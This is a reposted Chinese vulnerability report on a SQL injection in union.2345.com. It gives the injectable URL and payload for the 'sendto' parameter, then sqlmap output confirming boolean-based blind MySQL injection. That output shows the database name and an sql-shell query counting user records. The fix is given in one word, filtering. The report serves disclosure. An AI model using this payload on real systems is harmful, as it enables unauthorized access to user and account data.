欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

2345某分站SQL注入需过滤

程序员文章站 2022-03-19 12:20:46
2345某分站SQL注入 2345大联盟 union.2345.com 注入点 https://union.2345.com/jifen/mall/index...

2345某分站SQL注入

2345大联盟 union.2345.com



注入点

https://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271



参数sendto



MySQL字符型注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: sendto

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU

---

[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:17:55] [INFO] testing MySQL

[13:17:55] [INFO] confirming MySQL

[13:17:55] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:17:55] [INFO] fetching current database

[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:17:55] [INFO] retrieved:

[13:17:55] [WARNING] reflective value(s) found and filtering out

union2345

current database: 'union2345'



影响联盟注册用户,设计用户资金安全



web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select count(*) from all_user

[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'

[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:25:38] [INFO] retrieved:

[13:25:38] [WARNING] reflective value(s) found and filtering out

4513

select count(*) from all_user: '4513'

sql-shell>


 

解决方案:

过滤